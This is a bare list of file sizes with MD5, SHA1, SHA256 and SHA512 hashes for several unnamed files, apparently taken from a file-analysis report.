SHA512e42efe6d6b3a3d8fe979a739c961c7870d7cb6a14f4a3893460f0232b57bae3eba3235282b4579802bdde90ab561a4273cea7ac8573a64333ef13c8269b32d54
-
Filesize
4KB
MD5f13850417b5b97d263ac25af67d25c7f
SHA153a3648780537c7e6774726a3a3e710f0671a14a
SHA2560161fb2023bf7e8002a4ecd8c3fdfef8a3a8843219cdcac5ba7e113f447e849b
SHA5125107c74dedb6057b2865dd94bd40e83a1a32019c9edae25c870bab6a6c1a3e65b8a6af2b1d47eb5227b418ab2a5f5c1e6e80ade19322e9092cbc5628237c5bc8
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe